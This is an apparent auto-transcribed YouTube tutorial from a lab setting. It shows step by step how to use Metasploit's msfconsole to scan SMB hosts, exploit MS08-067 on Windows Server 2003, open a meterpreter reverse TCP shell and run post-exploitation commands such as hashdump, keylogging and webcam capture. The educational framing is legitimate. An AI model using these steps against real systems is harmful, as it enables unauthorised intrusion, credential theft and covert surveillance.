to if you get a little confused okay so um auxilary holds as we've seen in or massage the directory tree structure auxilary hold some of your scanners fuzzers you know ddos attackers you know brute force or things like that scanners that we want to use in terms of what the MSF scan was all about is actually called SMB underscore version because we want to find out what version these operating systems are actually the true versions of the operating systems are so anytime that you want to find an actual scanner exploit vulnerability payload whatever that you're looking for and you know the name of it you can use the locate command so that's locate and then I'm looking for specifically SMB version and now you can see it tells me that it's in auxilary scanner SMB SMB version that's the scanner that I want to use but what if I didn't know the name of the actual scanner that I was looking to use right so I could do show auxilary and it's going to show me everything in the auxilary directory tree structure and it may take a minute or maybe a little less depending on how fast your system is because it is literally querying and doing like a directory command on everything that is in auxilary folder now you can see here it Scrolls back everything that's under auxilary okay so we want to look for SMB because we know that we're looking to do some Windows stuff and if we look here we only have a few options for SMB scanners starting at the very top here SMB pipe auditor things like that well SMB pse exec okay SMB - and we are looking for SMB version so right here it's under auxilary as the top directory then it's in scanner SMB SMB version okay so let's just clear out the screen here all right so first we want to use that actual tool so the command is simple use auxilary scanner oops SMB and then SMB underscore version okay and you can always use tab as autocomplete you can also arrow up arrow down if you want to you know go through your commands that you've already issued and just do it again so I'm going to hit enter now you can see that the screen has changed a little bit here and the SMB version is now highlighted in red so that's actually what we're actually in right now so we want to know what options are available to us in this this script that we're using so simply type in show options and it will tell you all the options now our hosts SMB domain work group SMB pass user thread so and so forth we can change all that we want to type in our hosts now we're going to type in a range right so we want to go from dot to 2.9 so it's simply to set an option it's set and then the option our hosts and you can use autocomplete on that just to make sure you're getting in the right syntax ok and then it's 192.168.1.2 through dot nine now you don't have to type in the dot before 9 keep that in mind and hit enter now if you did show options again you should see that it reflected and here it is okay so our changes have been made and now simply we want to run the scanner so what's the command run very simple right now you can see it's going through and it's going to do a determination on the operating system and the service pack available to it now it's not always a 110 percent accurate but it's pretty damn close most of the time and you can see it's going to take a little while depending on the IP address range or scanning you know your internet speed your computer speed all those things again guys factored into any of the scans that we ever do so keep that in mind if things are going a little bit slow ok so it's at scanned 8 out of 8 hosts 100% complete auxilary module execution completed fantastic so now if we issue the host command again now we have a little bit more accurate depiction of what our machines actually look like so now 1.9 instead of reporting is it was Windows XP guess what it's Windows Server 2003 service packs 0 right so I know 1.3 is my box here so again I just want to remove that with host dash D and then 192.168.1.3 ok clear the screen again type in hosts ok so now we know what we're working with here right so let's get back to our set G command because now we know that we're up against a Windows 2003 server and we want to target that first and foremost because hey that's the meat potatoes of everything right if you get access in that system depending on what type of access or level of access we get we can pretty much own the rest of the network right so that's going to be our target machine we want to go after first all right so now if you if you think that you know a target network has high level security you probably want to go a little bit lower level you won't start with a workstation and try to work your way up to getting to the server ok but since this is our lab network I know I just want to go after the Windows domain controller first and then try to own everything else after that so anytime you want to get out of whatever module or scanner or whatever you're using just type in back and it'll get you out of it well let's clear this out again and let's go ahead and issue our host command so we know we're up against alright so getting back to set G the command to set those is simply set G and then if you just hit enter it's going to show you that there's no global entries in there right now so we want to do set G our hosts and we want to set that to 192.168.1.0 after right and if we do set G again by itself we can see that the our host is now set to 192 168 1.9 beautiful thing so clear this out again now we know already that MSO 800 67 that Windows 2003 server is actually vulnerable to that now if you weren't sure where an exploit actually lives or payload actually lives you can always do that locate a command again so if we did locate MS o 8 underscore o 67 you can see that it's in exploits windows SMB MS o 8 o 67 so whenever we want to use something a command is always going to be used and when you want to do a payload you're going to set the payload to use when that exploit actually happens so keep that in mind it's used to use a scanner payload I'm sorry used to use a scanner and exploit so and so forth set to set the payload that's going to be working with that exploit so we want to set up our exploit first so we use use exploits exploit windows SMB following our path up here from our locate command MS o 8 o 67 net API hit enter ok so now you can see that your your in this actual exploit so again show options ok well now you can see that our our host is already filled in for us right because it's a set G command the global parameter that we put in we don't want to change our port but you can if you want to and how you would do that is just simply set to set an option you just type in set not set G and then you do our port whatever it is and then I'm just going to leave this the same but just to show you how it works 4 4 5 and now of course if you did show options again you can see that it's taken it it's in there already but generally speaking you leave the our port alone because that's what the exploit is actually set up to work off of so you don't really want to change that unless of course you know your client has changed that service to a different port then of course you're going to want to have to do that so anyway now we have our exploit set up that's the exploit we're going to use so now we need to pick our payload I love Windows and interpreter shells I mean they're just awesome and they give you so much power and control over the system once you've compromised it that that's all I seem to tend to stick to now there is a meterpreter version for linux if you want to learn more about meterpreter you can go on a couple of different websites I'll put one in the description as well if you want to go on that or of course you can always go to learn net set calm and check out our forums ask us about it over there okay so now we want to use or I'm sorry we want to set the payload that we're going to use so I want to locate my meterpreter oops payloads and you can see it Scrolls past a bunch guys right so there's going to be scripts meterpreter interpreter interpreter then of course you're going to go up here there's going to be modules payload stages there's a bunch of stuff in here so you may want to take some time getting familiar with the directory structure and where it's actually at you know what what you want to use but we want to use something for Windows so we're going to look through this whole line of stuff here for something that would go into Windows well pro version that's only for the pro so here we can go data meterpreter and so and so forth but I happen to know where that is already from you know just remembering it pretty much so I'm going to get out of here and I'm just going to clear the screen so I want to set payload okay and then you so you're telling it to set the payload that you want to use and then it's in Windows sometimes it takes a minute if you're doing autocomplete so it's windows interpreter and then it's reverse TCP I want to use now there's a bunch of different options you use reverse TCP you reverse or bind TCP you can you reverse DNS so on and so forth I like reverse TCP as my default because it seems to work the best for me anyway okay so once I do that I hit set and now it's set the Windows payload for that okay so once you do that and you do show options again you're going to go ahead and find where the payload options are so you want to set L host for your local host to your IP address of your Kelly Linux machine this case it's 1.99 now keep in mind for L port if you're using the default port 4 4 4 4 if you're behind in that device like a router something like that you want to do the port forwarding of course if you're doing something over the LAN of course if you're local then you don't have to worry about that or you could put your Kelly Linux machine up on the DMZ and not have to worry about any of that so I'm going to set my ell host to 1.99 now if I do show options again you can see that everything is set for me so I've set to my exploit and I've set the our host which was set by set G the global parameters and now in payload options I did my reverse TCP now again you can use set G to set your L host as well if you wanted to so a simple set G L host 192.168.1.1 a nine or or attacking machine okay and then of course set G you can now see that it's both set okay in any case now we're ready to fire our script but do we really want to fire it yet or do we want to check to make sure that that host is actually vulnerable so simply if you want to check just type in check and hit enter and here we go it says the target is vulnerable now this is much the same as you see the output in Armitage in the console windows so I know this target is vulnerable I want to go ahead and fire it so I just simply type in exploit tak J to background it and go ahead and hit enter once you see as I said sending stage you know that you're almost guaranteed to be in next line you see is meterpreter session one opened on our local computer here on port four four four four and then it's to the target machine on port 1739 now you might be saying yourself well oh great but it looks like the screen is frozen it's not just hit enter and that's going to drop you back to your command line now it says that it opened a session but how do we find out what sessions that we have open simply type in the sessions command and hit enter and you can see that the session ID one is meterpreter and it is running as system at one nine the target IP address of 1.9 okay well now great we know we have but how do we interact with that how do we get into the meterpreter shell very simple there's no right-click menus here like there was a Norma Taj so its sessions tech I oops tag I for interact and then the session ID which is one in our case okay so now we're dropped into a mature pair shell well that's all well and good but how do we know what to do here there's no right-click menu well simple type and help there we'll give you a list of all the commands that you can actually do and their top-level meaning like privileged SLV commands get system what we know we're already systems so we don't have to worry about that you got hash dump to dump the password hashes you've got time stomp to manipulate the mace attributes do you have a bunch of different stuff in here like get desktop you could do a start a key logger in there you can do screen shots you know like for instance if I want to do a screen shot right now I just type in screen shot hit enter and it tells you the screen shot was saved to route EDI GWT whatever it makes up some random name so now if we went into our computer and we went into file system and then we went into route well we can see that there's a jpg here so open with image viewer it may just take a second here my systems lagging a little bit okay well there's a screenshot that it just took so it's it's in its idle screen so we know nobody's sitting in front of it right now right so that's pretty awesome and then again I mean you know you have a bunch of different commands here you can record their microphone their webcam I mean you can list webcams if there is one attached I don't have one attached acts as a virtual machine but you could drop into a system shell you can modify the remote registry you can reboot the computer you could kill a process you can list the processes here with PS you can get prints get PID so if we want to do get PID looks like current PID is 920 if we did PS to list all the processes you would look for 920 in there for process ID and here we are right here so we are under the svchost.exe and that's where we're at okay so you can issuing the help command just to go through some more the other parameters here you can do an upload upload a file directory you can remove directory you know you can do basically you can cat some directories of a file stuff like that so I mean there's a whole lot of stuff you can do here migrate process is pretty much everything you could do and a little bit more from Armitage the way with the right-click menu and all that good stuff yeah I mean there's there's a ton of stuff you could do in here guys but that's pretty much it for using meterpreter if you want to get out of meterpreter and kill your session at the very same time you can always do exit right so those sessions are closed and if we type in sessions again you can see that there's no active sessions so let me just get out of here I want to go ahead and just do this quickly so you guys see how fast once you get used to see how fast it actually works so again I want to list my hosts I want to go after 1.9 I've done my set G parameters already so I know that that's good I want to use exploit windows SMB MSO 8 o 67 I want to show options and it looks like my options were set in there and of course I want to use my meterpreter shell so it's set payload windows Terp retur reverse TCP show options my L host is already set because I did to set G now I just want to do check vulnerable I want to exploit J there you go my sessions opened now let's say if you list your sessions and you just like alright good I got a shell on that box really didn't do anything else you can always do kill command in session so it's sessions tak Kay and then the session ID which is in our case two sessions closed sessions again no active sessions we're all done and we can back out of here and clear and we can exit MSF console and we are back to normal right so that's pretty much it guys for using MSF console in place of Armitage now Armitage might be easier for some beginners because it is GOI based it's kind of point-and-click and kill whereas some of our seasoned veteran guys might be more comfortable with MSF console and like I said I've noticed a few bugs inside of Armitage that you know like with PSE exec and pass the hash which didn't show as a compromised host meanwhile I did the same thing in MSF console the same exact way and sure enough it gave me a reverse meterpreter shell on that box so meanwhile while there wasn't any other active exploits as we've seen for like the Windows XP service pack 3 box in Armitage or the Windows Server 7 box in Armitage I was able to actually use pass the hash and PS exe PS exec and actually compromise those machines and open meterpreter sessions on those as well so that's pretty much it guys make sure to give us a thumbs up on a video if you liked it you learned something make sure to subscribe to our channel here also make sure to check out our website learn net set comm join the forums and hang out with us chat with us ask questions we're there to help and learn from each other follow us on Twitter check us out on Facebook all the links are in the description for everything we discussed here today and thanks for watching guys I'll see you in the next video take care

Info

Channel: NetSecNow

Views: 647,891

Rating: undefined out of 5

Keywords: Exploit, Computer, Virtual, How-to, Linux, Kali Linux, Metasploit, Armitage, nmap, zenmap, Tutorial, Hacking, Ethical, Hacker, Windows, Vulnerability, Lab, Proxmox, Proxmox VE, Configuration, Howto, Server, Proxmox Virtual Environment, Hacker (Character Power), Debian, Microsoft Windows (Operating System), Network, Security, Penetration Tester, PenTest, Metasploit Project (Software), msfconsole

Id: lZlqr2PFJIo

Channel Id: undefined

Length: 74min 8sec (4448 seconds)

Published: Sun Jul 28 2013